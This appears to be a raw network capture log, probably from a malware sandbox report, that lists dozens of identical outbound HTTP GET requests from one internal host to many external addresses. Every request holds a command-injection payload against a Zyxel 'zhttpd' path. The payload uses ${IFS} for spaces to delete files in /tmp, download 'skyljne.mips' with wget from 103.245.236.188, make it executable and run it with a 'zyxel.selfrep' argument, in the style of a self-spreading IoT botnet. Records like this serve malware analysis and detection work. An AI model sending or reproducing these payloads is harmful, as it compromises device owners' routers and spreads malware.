                                                Jan 12, 2024 18:24:35.829953909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4348192.168.2.1336130129.17.209.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.829982042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4349192.168.2.1341814135.67.209.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830061913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4350192.168.2.13576462.192.121.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830111027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4351192.168.2.1339340133.29.99.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830188036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4352192.168.2.136072212.54.50.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830220938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4353192.168.2.1359716109.233.184.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830271959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4354192.168.2.1358816128.63.70.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830306053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4355192.168.2.1349988145.164.130.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830358028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4356192.168.2.1350468169.97.94.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830400944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4357192.168.2.1360464210.56.6.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830447912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4358192.168.2.1340500102.254.209.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830504894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4359192.168.2.1336208223.21.18.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830568075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4360192.168.2.1357920135.173.163.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830610037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4361192.168.2.1349804216.100.205.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830638885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4362192.168.2.1343416144.150.116.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830683947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4363192.168.2.1343086210.223.187.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830708027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4364192.168.2.135579469.51.146.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830755949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4365192.168.2.1354402221.149.65.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830790043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4366192.168.2.133952074.213.179.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830856085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4367192.168.2.134992235.109.229.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830913067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4368192.168.2.1346504163.99.243.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.830957890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4369192.168.2.1352000177.93.25.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831032038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4370192.168.2.1339128135.173.43.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831068039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4371192.168.2.1350062143.140.121.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831123114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4372192.168.2.1359034103.145.8.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831173897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4373192.168.2.134564457.5.2.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831219912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4374192.168.2.1358718121.122.206.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831269979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4375192.168.2.1358284131.33.192.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831312895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4376192.168.2.133540445.226.8.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831367970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4377192.168.2.1353538134.205.194.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831419945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4378192.168.2.135188047.19.220.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831469059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4379192.168.2.136063672.22.185.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831531048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4380192.168.2.134436886.98.42.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831554890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4381192.168.2.134996250.240.111.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831598043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4382192.168.2.1357426116.121.234.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831655025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4383192.168.2.1355174185.168.26.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831723928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4384192.168.2.133775612.255.58.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831762075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4385192.168.2.1338954129.143.232.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831798077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4386192.168.2.1336728112.39.212.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831834078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4387192.168.2.1356708167.20.9.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831892967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4388192.168.2.1349930190.214.96.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831945896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4389192.168.2.1344118201.27.112.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.831979036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4390192.168.2.1340680200.156.250.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832026958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4391192.168.2.134982687.200.146.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832066059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4392192.168.2.1357166132.35.146.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832113028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4393192.168.2.1347462184.48.158.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832151890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4394192.168.2.1334644157.71.190.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832204103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4395192.168.2.1341722197.130.224.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832279921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4396192.168.2.1360892105.52.101.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832329988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4397192.168.2.1338302108.118.152.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832379103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4398192.168.2.1340850155.235.135.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832451105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4399192.168.2.13373429.204.240.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832478046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4400192.168.2.1347426105.14.184.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832536936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4401192.168.2.134708248.7.42.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832580090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4402192.168.2.1340638102.247.111.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832638979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4403192.168.2.1335662123.30.118.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832657099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4404192.168.2.1339908178.142.51.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832716942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4405192.168.2.1349876161.168.106.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832741976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4406192.168.2.1333968194.211.98.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832787991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4407192.168.2.1346848187.116.173.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832815886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4408192.168.2.1349212183.185.108.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832861900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4409192.168.2.1336670210.251.197.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.832909107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4410192.168.2.134039252.217.255.45443
                                                TimestampBytes transferredDirectionData
